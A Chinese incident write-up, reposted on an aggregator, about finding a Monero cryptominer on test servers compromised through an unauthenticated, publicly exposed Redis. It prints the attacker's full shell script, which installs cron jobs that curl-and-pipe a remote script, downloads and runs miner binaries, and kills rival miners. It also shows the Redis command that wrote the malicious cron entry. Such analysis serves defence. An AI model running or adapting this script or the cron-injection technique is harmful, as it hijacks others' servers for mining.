? ?周日看到值班人員在群里發(fā)幾臺(tái)服務(wù)器CPU負(fù)載高告警。沒在意。周一下午查看nagios 發(fā)現(xiàn)服務(wù)器的負(fù)載依舊很高。趕緊查看進(jìn)程

看到第二張圖的時(shí)候。想必大家明白了。又是挖礦軟件。記得之前曝光過是一款叫minerd的挖礦程序。這玩意。 結(jié)束掉進(jìn)程肯定是不夠的。必然有相應(yīng)的守護(hù)進(jìn)程或者計(jì)劃任務(wù)。查看了crontab。果然，

可惡的域名，居然是haveabitchin（google了下。這個(gè)域名可謂惡行累累，網(wǎng)上的中了挖礦軟件的大部分都是從這個(gè)域名分發(fā)出來的），下載了他的腳本下來，知己知彼百戰(zhàn)不殆。

export?PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo?"*/5?*?*?*?*?curl?-fsSL?http://www.haveabitchin.com/pm.sh?0218?|?sh"?>?/var/spool/cron/root mkdir?-p?/var/spool/cron/crontabs echo?"*/5?*?*?*?*?curl?-fsSL?http://www.haveabitchin.com/pm.sh?0218?|?sh"?>?/var/spool/cron/crontabs/root if?[?!?-f?"/tmp/ddg.222"?];?then curl?-fsSL?http://www.haveabitchin.com/ddg.$(uname?-m)?-o?/tmp/ddg.222 fi chmod?+x?/tmp/ddg.222?&&?/tmp/ddg.222 CleanTail() { ps?auxf|grep?-v?grep|grep?/tmp/duckduckgo|awk?'{print?$2}'|xargs?kill?-9 ps?auxf|grep?-v?grep|grep?"/usr/bin/cron"|awk?'{print?$2}'|xargs?kill?-9 ps?auxf|grep?-v?grep|grep?"/opt/cron"|awk?'{print?$2}'|xargs?kill?-9 ps?auxf|grep?-v?grep|grep?"/usr/sbin/ntp"|awk?'{print?$2}'|xargs?kill?-9 ps?auxf|grep?-v?grep|grep?"/opt/minerd"|awk?'{print?$2}'|xargs?kill?-9 ps?auxf|grep?-v?grep|grep?"mine.moneropool.com"|awk?'{print?$2}'|xargs?kill?-9 ps?auxf|grep?-v?grep|grep?"xmr.crypto-pool.fr:8080"|awk?'{print?$2}'|xargs?kill?-9 } DoYam() { if?[?!?-f?"/tmp/AnXqV.yam"?];?then curl?-fsSL?http://www.haveabitchin.com/yam?-o?/tmp/AnXqV.yam fi chmod?+x?/tmp/AnXqV.yam /tmp/AnXqV.yam?-c?x?-M?stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr } DoMiner() { if?[?!?-f?"/tmp/AnXqV"?];?then curl?-fsSL?http://www.haveabitchin.com/minerd?-o?/tmp/AnXqV fi chmod?+x?/tmp/AnXqV /tmp/AnXqV?-B?-a?cryptonight?-o?stratum+tcp://xmr.crypto-pool.fr:443?-u?44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM?-p?x } DoMinerNoAes() { if?[?!?-f?"/tmp/AnXqV.noaes"?];?then curl?-fsSL?http://www.haveabitchin.com/minerd.noaes?-o?/tmp/AnXqV.noaes fi chmod?+x?/tmp/AnXqV.noaes /tmp/AnXqV.noaes?-B?-a?cryptonight?-o?stratum+tcp://xmr.crypto-pool.fr:443?-u?44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM?-p?x } ps?auxf|grep?-v?grep|grep?"4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk?'{print?$2}'|xargs?kill?-9 ps?auxf|grep?-v?grep|grep?"47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk?'{print?$2}'|xargs?kill?-9 ps?auxf|grep?-v?grep|grep?"AnXqV"?||?DoMiner ps?auxf|grep?-v?grep|grep?"AnXqV"?||?DoYam ps?auxf|grep?-v?grep|grep?"AnXqV"?||?DoMinerNoAes

又查看仔細(xì)查看了系統(tǒng)進(jìn)程。 再次揪出了他的守護(hù)進(jìn)程

還原案發(fā)現(xiàn)場(chǎng)

由于這幾臺(tái)機(jī)器都是測(cè)試環(huán)境。還沒正式上線。查看進(jìn)程的時(shí)候發(fā)現(xiàn)redis居然在公網(wǎng)地址有監(jiān)聽。而且沒有密碼。之前看過可可以通過redis修改數(shù)據(jù)存儲(chǔ)目錄和文件名上傳公鑰到服務(wù)器。但是路由器上是絕對(duì)禁止非公司IP訪問SSH的。那么程序是如何植入到服務(wù)器的呢？查看redis 的AOF文件。終于找到了破綻

看到執(zhí)行了這個(gè)操作

set?1?“\n\n*/1?*?*?*?*?curl?-L?http://www.haveabitchin.com/pm.sh?v21.redis.lan?6389?|?sh\n\n” del?1

上圖中url的腳本內(nèi)容我就不貼了，和上一個(gè)腳本類似

之前的漏洞是寫入公鑰到服務(wù)器的.ssh目錄。現(xiàn)在***變懶了，我也可以不登錄服務(wù)器。利用計(jì)劃任務(wù)，讓服務(wù)器自動(dòng)挖礦

具體實(shí)現(xiàn)是：

***將redis的數(shù)據(jù)存儲(chǔ)目錄放到了/var/spool/cron.文件名為root。 當(dāng)crontab運(yùn)行后。又將新的計(jì)劃任務(wù)添加到了服務(wù)器上。然后刪除了key。

轉(zhuǎn)載于:https://blog.51cto.com/itanony/1900251

總結(jié)

以上是生活随笔為你收集整理的利用redis漏洞远程添加计划任务挖取比特币的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。